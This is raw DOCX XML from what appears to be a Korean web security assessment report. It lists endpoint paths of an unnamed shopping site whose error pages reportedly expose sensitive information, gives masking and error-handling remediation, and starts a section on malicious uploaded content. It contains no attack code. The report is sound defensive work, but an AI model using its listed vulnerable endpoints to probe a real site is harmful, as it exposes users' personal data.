BqnX1t+1+zfg9Xjcp39BgAA//8DAFBLAwQUAAYACAAAACEA&#10;QaoYyd4AAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3KhTgxIT4lSAhBCo&#10;Byhwd2M3iWqvo9hNwt+znOA4s0+zM9Vm8Y5Ndox9QAXrVQbMYhNMj62Cz4+nKwksJo1Gu4BWwbeN&#10;sKnPzypdmjDju512qWUUgrHUCrqUhpLz2HTW67gKg0W6HcLodSI5ttyMeqZw77jIspx73SN96PRg&#10;HzvbHHcnr+AtHA/cfQnxWjw8i+LFy7mdtkpdXiz3d8CSXdIfDL/1qTrU1GkfTmgic6TlOidUgbiR&#10;BTAi5PUtOXty8rwAXlf8/4b6BwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAA&#10;lAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACqKaPS3AgAA&#10;pAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAEGqGMne&#10;AAAACwEAAA8AAAAAAAAAAAAAAAAAEQUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAc&#10;BgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009A0C67">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="197A57CA" wp14:editId="52686D7B">
            <wp:extent cx="4572000" cy="2842422"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15240"/>
            <wp:docPr id="1951474565" name="그림 195147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282" r="2063" b="31592"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2842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54A6C6" w14:textId="417B262F" w:rsidR="00334326" w:rsidRPr="00334326" w:rsidRDefault="009A0C67" w:rsidP="009A0C67">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="336" w:name="_Toc206630382"/>
      <w:bookmarkStart w:id="337" w:name="_Toc206630520"/>
      <w:bookmarkStart w:id="338" w:name="_Toc209094593"/>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20</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에러 페이지 내 중요정보 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="336"/>
      <w:bookmarkEnd w:id="337"/>
      <w:bookmarkEnd w:id="338"/>
    </w:p>
    <w:p w14:paraId="4D7CD3FB" w14:textId="0B030435" w:rsidR="00B96FB0" w:rsidRDefault="00B96FB0">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECC9C0A" w14:textId="77777777" w:rsidR="00174A60" w:rsidRPr="00CB22A6" w:rsidRDefault="00174A60" w:rsidP="00174A60">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190"/>
        <w:gridCol w:w="4890"/>
      </w:tblGrid>
      <w:tr w:rsidR="00232517" w:rsidRPr="00B112DB" w14:paraId="575B9EFE" w14:textId="77777777" w:rsidTr="005B5CA9">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B683FFB" w14:textId="74EA733E" w:rsidR="00232517" w:rsidRPr="00CB22A6" w:rsidRDefault="00232517" w:rsidP="005E115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190" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="696B7E10" w14:textId="77777777" w:rsidR="00232517" w:rsidRPr="00CB22A6" w:rsidRDefault="00232517"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5BD00BA5" w14:textId="77777777" w:rsidR="00232517" w:rsidRPr="00CB22A6" w:rsidRDefault="00232517"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232517" w:rsidRPr="00B112DB" w14:paraId="7F8EBD1F" w14:textId="77777777" w:rsidTr="005B5CA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70EF5F3F" w14:textId="54B38EEF" w:rsidR="00232517" w:rsidRPr="00CB22A6" w:rsidRDefault="00232517"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C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ase 1</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5E016" w14:textId="77777777" w:rsidR="00232517" w:rsidRPr="00CB22A6"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A126A90" w14:textId="33C77B52" w:rsidR="00232517" w:rsidRPr="00CB22A6"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w:t>
            </w:r>
            <w:r w:rsidR="003A2108">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>member_admin_list.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00232517" w:rsidRPr="00B112DB" w14:paraId="033137F7"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val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DF8280A" w14:textId="441B1CD7" w:rsidR="00232517" w:rsidRDefault="00232517" w:rsidP="005E1156">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 xml:space="preserve">Case </w:t>
            </w:r>
            <w:r w:rsidR="006C557B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</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0DA273" w14:textId="77777777"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385B66">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">상품 </w:t>
            </w:r>
            <w:r w:rsidR="00385B66">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidR="00385B66">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>상품평</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7424D3C2" w14:textId="20B9E60B" w:rsidR="00385B66" w:rsidRDefault="00385B66"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write</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3DCA84C" w14:textId="06D2D986" w:rsidR="00232517" w:rsidRPr="00BF251E" w:rsidRDefault="00F165F1" w:rsidP="005E1156">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90C43">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00E90C43">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
            <w:r w:rsidRPr="00E90C43">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>oginForm.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00232517" w:rsidRPr="00B112DB" w14:paraId="18BA5077"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123CB5BB" w14:textId="3DD5A5BA"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33B53C" w14:textId="77777777"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385B66">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>마이페이지</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E1486DA" w14:textId="17B80D96" w:rsidR="00385B66" w:rsidRDefault="00385B66"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t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">주문/배송 내역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상품명</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486215A" w14:textId="61EFB043" w:rsidR="00232517" w:rsidRPr="00BF251E" w:rsidRDefault="00232517" w:rsidP="005E1156">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FB728C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00F165F1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>my_detail.do?order_no=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00232517" w:rsidRPr="00B112DB" w14:paraId="45EC226B"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3EADA5BE" w14:textId="2DC49A1B"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BC52ED" w14:textId="30B178D4"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477EFB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>상품</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1C60CF7" w14:textId="4349D83A" w:rsidR="00232517" w:rsidRPr="00FB728C" w:rsidRDefault="00232517" w:rsidP="00232517">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FB728C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00F165F1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>shop/goodsDetail.do?IDX=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00232517" w:rsidRPr="00B112DB" w14:paraId="5559F594"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bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E964473" w14:textId="77777777"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9DAE8" w14:textId="77777777" w:rsidR="00232517" w:rsidRDefault="00477EFB"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p>
          <w:p w14:paraId="05CCA37B" w14:textId="046C6F25" w:rsidR="00477EFB" w:rsidRDefault="00477EFB"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QNA &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>글 확인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6A865E6" w14:textId="02F8F367" w:rsidR="00232517" w:rsidRPr="00FB728C" w:rsidRDefault="00F165F1" w:rsidP="00232517">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F165F1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>qna/openQnaDetail.do?QNA_NO</w:t>
            </w:r>
            <w:r w:rsidR="004751D7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidR="00E90C43">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&amp;RNNUM=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="010A4A93" w14:textId="60C065A1" w:rsidR="00174A60" w:rsidRDefault="00174A60" w:rsidP="00232517">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5007ABED" w14:textId="77777777" w:rsidR="001E4BC6" w:rsidRPr="001E4BC6" w:rsidRDefault="001E4BC6" w:rsidP="001E4BC6"/>
    <w:p w14:paraId="3AB3A282" w14:textId="43DFDA84" w:rsidR="00393FFA" w:rsidRDefault="00174A60" w:rsidP="0020266A">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCED177" w14:textId="5F2E45CF" w:rsidR="0020266A" w:rsidRDefault="0020266A" w:rsidP="0020266A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">중요 정보가 존재하는 페이지는 사용자와 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>관리자 모두 접근할 수 없도록 완전히 차단해야 합니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>불가피하게 접근이 가능한 경우에는 적절한 에러 처리 루틴을 통해 안전하게 처리해야 합니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>또한,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개인정보를 조회하거나 출력할 시 아래와 같은 원칙으로 일부 정보에 마스킹을 적용해 표시하도록 해야 하며,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">중요정보를 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>소스에 포함하지</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>않도록 해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D391103" w14:textId="77777777" w:rsidR="006C557B" w:rsidRDefault="006C557B" w:rsidP="0020266A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D89AA17" w14:textId="77777777" w:rsidR="0020266A" w:rsidRDefault="0020266A" w:rsidP="0020266A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>1) 성명 중 이름의 가운데 글자 (ex : 홍*동)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754EDF10" w14:textId="574EEBBE" w:rsidR="0020266A" w:rsidRDefault="0020266A" w:rsidP="0020266A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>2) 생년월일 (ex : ****년 **월 **일</w:t>
      </w:r>
      <w:r w:rsidR="006D2231">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD0572E" w14:textId="77777777" w:rsidR="0020266A" w:rsidRDefault="0020266A" w:rsidP="0020266A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>3) 전화번호 또는 휴대전화번호 (ex : 02-****-5678, 010-****-5678)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAD6EFA" w14:textId="7CCB2496" w:rsidR="0020266A" w:rsidRDefault="0020266A" w:rsidP="0020266A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>4) 주소의 읍/면/동 (ex : 서울시 송파구 ***동)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F29ABCC" w14:textId="707082A0" w:rsidR="0020266A" w:rsidRDefault="0020266A" w:rsidP="0020266A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>5) IP v4 주소의 경우 17~24bit, IP v6 주소의 경우 113~128bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133C669F" w14:textId="77777777" w:rsidR="006C557B" w:rsidRDefault="006C557B" w:rsidP="0020266A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27501BE7" w14:textId="614E4866" w:rsidR="001C0678" w:rsidRDefault="002E553F" w:rsidP="0020266A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">마지막으로 </w:t>
      </w:r>
      <w:r w:rsidR="00207DCD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">웹에서 발생하는 에러 메시지는 </w:t>
      </w:r>
      <w:r w:rsidR="00207DCD">
        <w:t>400, 500</w:t>
      </w:r>
      <w:r w:rsidR="00207DCD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>번대의 에러 코드를 반환하는데 이러한 에러 코드에 대해 별도의 에러 페이지로 리다이렉트하거나 적절한 에러처리 루</w:t>
      </w:r>
      <w:r w:rsidR="006316AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>틴</w:t>
      </w:r>
      <w:r w:rsidR="00207DCD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 설정하여 처리되도록 해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D5507" w14:textId="77777777" w:rsidR="00267727" w:rsidRDefault="001C0678">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1673B1B8" w14:textId="6801BD9A" w:rsidR="00267727" w:rsidRDefault="00267727" w:rsidP="00367091">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="339" w:name="_Toc209094558"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>악성 콘텐츠</w:t>
      </w:r>
      <w:bookmarkEnd w:id="339"/>
    </w:p>
    <w:p w14:paraId="6F759EB5" w14:textId="77777777" w:rsidR="00267727" w:rsidRDefault="00267727" w:rsidP="00267727">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E5A1CA" w14:textId="03F30CD3" w:rsidR="00267727" w:rsidRPr="00267727" w:rsidRDefault="00267727" w:rsidP="00267727">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r w:rsidRPr="00267727">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹사이트의</w:t>
      </w:r>
      <w:r w:rsidRPr="00267727">
        <w:t xml:space="preserve"> 게시판, 댓글, 자료실 등에서 악의적인 스크립트, 파일 또는 코드가 삽입되어 실행되는 보안 취약점입니다. 사용자가 악성코드에 감염될 수 있으며, 웹 페이지 변조 등 심각한 보안 위협에 노출될 위험이 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187C8AC4" w14:textId="77777777" w:rsidR="00267727" w:rsidRPr="00CB22A6" w:rsidRDefault="00267727" w:rsidP="00267727">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC9285" w14:textId="2E07475A" w:rsidR="00267727" w:rsidRDefault="00267727" w:rsidP="003240A2">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r w:rsidRPr="00267727">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사이트</w:t>
      </w:r>
      <w:r w:rsidRPr="00267727">
        <w:t xml:space="preserve"> 게시판 등에 악성 콘텐츠가 업로드되어 실행된 사례가 확인되었습니다</w:t>
      </w:r>
      <w:r w:rsidR="00EA1BAE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00267727">
        <w:t xml:space="preserve"> 이로 인해 공격자가 웹 서버를 장악하거나 시스템을 변조할 위험이 존재합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0757D9C8" w14:textId="3531A72C" w:rsidR="00267727" w:rsidRDefault="00267727" w:rsidP="003240A2">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CE722D1" w14:textId="424908C8" w:rsidR="00267727" w:rsidRDefault="003240A2" w:rsidP="00267727">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F755FA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251917312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="705BC2D6" wp14:editId="0B3CEA84">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4549140</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2416868</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="429260" cy="172720"/>
                <wp:effectExtent l="0" t="0" r="27940" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474586" name="직사각형 1951474586"/>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BD2F0" id="직사각형 1951474586" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:358.2pt;margin-top:190.3pt;width:33.8pt;height:1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8l4uAIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG1mCnY8ROTASuCgQ&#10;JEGTImuaIi0BFIclacvuLr1Dgd6gmy56riK9Q4fUJ0YadFFUC4rkzLzhvPmcnm1rRTbCugp0TtOD&#10;ESVCcygqvcrph7vFm2NKnGe6YAq0yOlOOHo2e/3qtDFTkUEJqhCWIIh208bktPTeTJPE8VLUzB2A&#10;ERqFEmzNPB7tKiksaxC9Vkk2Gh0mDdjCWODCOby9aIV0FvGlFNxfS+mEJyqn+DYfVxvXZViT2Smb&#10;riwzZcW7Z7B/eEXNKo1OB6gL5hlZ2+oPqLriFhxIf8ChTkDKiosYA0aTjp5Fc1syI2IsSI4zA03u&#10;/8Hyq82NJVWBuTuZpOOj8eT4kBLNaszV47eHx8/ff/54+PX1C9kTI2eNcVM0vTU3tjs53AYCttLW&#10;4Y+hkW3keTfwLLaecLwcZyfZIWaDoyg9yo6ymIfkydhY598KqEnY5NRiGiO7bHPpPDpE1V4l+NKw&#10;qJSKqVSaNCGW0WQULRyoqgjSoOfsanmuLNkwrIbFYoRfKABE21PDk9J4GUJsg4o7v1MiYCj9Xkgk&#10;DMPIWg+hVMUAyzgX2qetqGSFaL1N9p31FtF1BAzIEl85YHcAvWYL0mO3b+70g6mIlT4Yd6H/zXiw&#10;iJ5B+8G4rjTYlyJTGFXnudXvSWqpCSwtodhhOVlo+8wZvqgwg5fM+RtmsbEw6Tgs/DUuUgFmCrod&#10;JSXYTy/dB32sd5RS0mCj5tR9XDMrKFHvNHbCSToeh86Oh/EkFBOx+5LlvkSv63PA7Kc4lgyP26Dv&#10;Vb+VFup7nCnz4BVFTHP0nVPubX849+0AwanExXwe1bCbDfOX+tbwAB5YDRV6t71n1nRl7LH+r6Bv&#10;ajZ9Vs2tbrDUMF97kFUs9SdeO75xEsTC6aZWGDX756j1NFtnvwEAAP//AwBQSwMEFAAGAAgAAAAh&#10;AFms0RPgAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8tOwzAQRfdI/IM1ldhRuyGKrTROBUgI&#10;gViUAns3dpOofkSxm4S/Z1jBcjRH955b7RZnyWTG2AcvYbNmQIxvgu59K+Hz4+lWAIlJea1s8EbC&#10;t4mwq6+vKlXqMPt3Mx1SSzDEx1JJ6FIaSkpj0xmn4joMxuPvFEanEp5jS/WoZgx3lmaMFdSp3mND&#10;pwbz2JnmfLg4CftwPlH7lWWv/OE54y9OzO30JuXNarnfAklmSX8w/OqjOtTodAwXryOxEvimyBGV&#10;cCdYAQQJLnJcd5SQMy6A1hX9v6H+AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAg